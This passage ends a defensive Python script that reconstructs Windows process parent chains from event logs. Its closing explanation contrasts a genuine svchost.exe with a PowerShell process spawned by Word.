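    return {ev["ProcessId"]: f for ev in events if (f := check_process(ev))}


def process_chain(events, pid):
    """Walk ParentProcessId links upward; fall back to ParentImage at the top."""
    by_pid = {e["ProcessId"]: e for e in events}
    chain = []
    while pid in by_pid:
        ev = by_pid[pid]
        chain.append(basename(ev["Image"]))
        pid = ev["ParentProcessId"]
        if pid not in by_pid:
            chain.append(basename(ev["ParentImage"]))
    return chain


if __name__ == "__main__":
    for pid, findings in analyze(EVENTS).items():
        print(pid, " <- ".join(process_chain(EVENTS, pid)))
        for f in findings:
            print("   ", f)
```

The genuine svchost.exe (services.exe parent, System32 path, -k argument) produces no findings, which is the baseline the impostor is judged against; the chain for the PowerShell process reads powershell.exe <- winword.exe <- explorer.exe, the shape this question describes.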
